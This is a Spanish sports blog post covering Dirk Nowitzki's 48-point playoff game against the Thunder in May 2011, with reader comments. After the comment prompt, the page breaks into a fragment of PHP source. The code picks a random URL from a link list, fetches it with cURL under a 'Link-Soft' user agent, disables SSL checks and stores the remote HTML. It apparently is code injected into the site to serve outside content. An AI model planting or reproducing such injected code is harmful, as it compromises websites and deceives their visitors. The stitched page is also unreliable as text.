La Crónica (17/05/2011): La locomotora alemana arrasa los Thunder

18 de May de 2011 por txusma

Dirk Nowitzki nos regaló anoche un partido prácticamente perfecto, con números de otro planeta. Anotó 48 puntos, lo que no parece muy espectacular en los tiempos que corren, pero es que lo hizo con un 12 de 15 en tiros de campo y un 24 de 24 en tiros libres. Nadie había anotado tantos libres sin fallo, ni siquiera el gran Michael Jordan que tiene el récord de más tiros libres anotados en un partido con 26.

Anoche el alemán estaba imparable. Anotó sus primeros lanzamientos, entró en calor y su confianza se elevó hasta límites insospechados. Los Thunder no pudieron hacer nada por pararle. Hasta 6 hombres diferentes intentaron defenderle y lo más que consiguieron fue cargarse de faltas. Empezó el rey de tapón, Serge Ibaka, que en poco más de 4 minutos ya veía como Dirk llegaba a los 10 puntos. Le siguieron Collison, Perkins, Durant, Sefolosha y Harden pero el resultado siempre fue el mismo: infructuoso. A lo mejor les faltó Jeff Green…

Con semejante locomotora, el resto de jugadores de los Mavs tan solo tuvieron que subirse y aportar su pequeño grano de arena.  Terry y Barea, ambos desde el banco, anotaron más de 20 puntos y acabaron de desarmar a unos Thunder que lucharon hasta la extnuación y plantaron batalla hasta los últimos minutos. Kevin Durant se fue a los 40 puntos (buen uno este también) pero Russell Westbrook no estuvo nada fino y acabó lastrando a su equipo.

Si este partido es prueba de las grandes cosas que han de venir más nos vale no despegarnos del televisor.

PREMIOS

MVP: Lo dicho, 48 puntos con un 12 de 15 en tiros de campo y 24 de 24 en tiros libres. Y además 6 rebotes, 4 asistencias y 4 tapones. La locomotora alemana arrasó con todo aquel que se le puso delante.

Sorpresa: ¿Cuántas van ya? JJ Barea anotó 21 puntos en escasos 16 minutos. El puertorriqueño está resultando clave en estos playoffs.

Decepción: Tras conseguir un triple doble en el anterior partido, Russell Westbrook no encontró su juegó al fallar 10 de sus 11 primeros lanzamientos y aportar solo 3 rebotes y 3 asistencias.

Esfuerzo en vano: A un Dirk de nivel superlativo tan solo puede enfrentarse un jugador como Kevin Durant. Su actuación (40 puntos, 10 de 18, 8 rebotes y 5 asistencia) también fue soberbia pero, por esta vez, quedó en un segundo plano.

Imágenes | AP Photos / Getty Images

Comenta

19 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Es el mas grande!!!!!!!!!!!

      Citar

  2. MagicJohnson32 dice:
    #2

    No es malo, no, el tal Nowitzki…

    Espero a ver el partido para opinar.

      Citar

  3. Len Bias dice:
    #3

    Qué barbaridad! Ayer Robin Hood era el rey del bosque.

      Citar

  4. anonymous dice:
    #4

    que vengan a decir ahora los forofos que Gasol es el mejor europeo

      Citar

  5. Cocinitas dice:
    #5

    Partidazooooo de Dirk!!!!! Madre mia parece imposible que nadie tan alto sea capaz de enchufarlas asi. Alguien se imagina si los Clippers no hubieran transpasado a Baron Davis tendrian el pick 1º y vaya trio de ases jovenes con Griffin, Gordon y Irving.

      Citar

  6. Fer dice:
    #6

    Buenas a todos, que crack el alemán. A ver si esta vez se lleva el anillo para coronarse como el mejor europeo de la historia.
    Estaría muy bien que preparaseis una serie de artículos que ya hacían en Blansket (blog muy bueno pero que ahora tienen un poco abandonado) en el que hacemos de gm’s de los equipos ( traspasos y demás pajas mentales). Es muy divertido.
    Ahí queda eso.
    Un saludo y a seguir así.

      Citar

  7. Txusma dice:
    #7

    @Fer

    Como iba la cosa exactamente? Mira que aquí estamos muy enfermos… 😀

      Citar

  8. Cocinitas dice:
    #8

    Me parece buena idea para el parón veraniego

      Citar

  9. JHC dice:
    #9

    Bueno aora que sale el nombre de la pagina en Blansket tenemos echa una especie de liga NBA en la que actuamos como managers de una franquicia NBA quedan 4 equipos sin managers, para mi seria muy bonito ver a los grandes de tjnba luchando contra los de blansket por ver quien sabe llevar mejor una franquicia

      Citar

  10. Tobal dice:
    #10

    Pero que bueno es Nowitzki,es un jugador grandioso,mítico e imparable,cuando tiene la muñeca caliente,no hay nadie como él,que facilidad para anotar desde cualquier distancia,este señor se merece un anillo de campeón.

      Citar

  11. Fer dice:
    #11

    Pues hacer de manager de las franquicias, lo que haríamos cada uno con cada equipo (podeis poner lo que haría uno de vosotros como entrada y en los comentarios lo de los demás), pero en plan serio, con los salarios que cuadren, por qué podrían hacer esos equipos los trapasos (por ejemplo no valdría que los Lakers cambiasen a Walton por DRose a los Bulls, o memeces de esas), etc.
    De todas formas para que te quede más claro pásate por aquí para que tú mismo lo veas. La verdad es que está muy bien, sobre todo para el verano cuando no hay partidos ni ná.

    http://blanen.blogspot.com/search/label/%C2%BFy%20si%20fueras%20G.M%3F

      Citar

  12. M dice:
    #12

    Que molón 😀

      Citar

  13. fan_r_miller dice:
    #13

    Todo el mundo save qe Dirk es una maquina i aunque me dolio la eliminacion de los lakers creo qe Dirk se merece un anillo eso si como veo por la calle al señor 9 de 10 en tribles (J Terry) le doy aunqe vaya con Chandler.

      Citar

  14. GreenPride dice:
    #14

    Pues gran partido para empezar esta serie que promete emociones de las buenas. Nowitzki se rió de todos los marcadores que fueron pasando por él y se hartó de sacarles faltas y de meter canastas por encima de ellos. Es quizás el jugador más difícil de defender cuando está en forma y ahora está que se sale. Será complicado que los Thunder encuentren con quien pararle pero quizás Dallas tenga el mismo problema con Durant que ayer también se salió. De hecho la clave del partido fue que mientras Dirk tenía a Barea y Terry jugando a gran nivel el bueno de Durant no tuvo a Westbrook a su lado y sólo Harden e Ibaka le ayudaron en menor medida.
    Necesitarán los Thunder ajustar bastante su defensa para tener opciones en el 2º partido y es de esperar que Westbrook dé más quebraderos de cabeza a Kidd y Barea a los que es muy superior físicamente. Si los Thunder consiguen defender algo mejor hay mucha serie por delante ya que siempre estuvieron en el partido

      Citar

  15. Len Bias dice:
    #15

    JHC, me interesa lo de GM Fantasy! Cómo puedo coger una franquicia? Si los cargos altos de TJNBA dejan alguna libre, me gustaría “jugar” 😉

      Citar

  16. JHC dice:
    #16

    Pues entra aqui y en el apartado de nuevos managers anuncia que quieres participar
    ya te indicaran cuales son los equipos que quedan http://www.blansket.es/foro/index.php?board=75.0

      Citar

  17. JHC dice:
    #17

    Anuncio que todavia quedan Lakers, Hawks y Raptors

      Citar

  18. Fer dice:
    #18

    Pos pa mi los Lakers si puede ser jejeje

      Citar

  19. JHC dice:
    #19

    okey pues kedan dos plazas x si alguien mas kiere partcipar

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>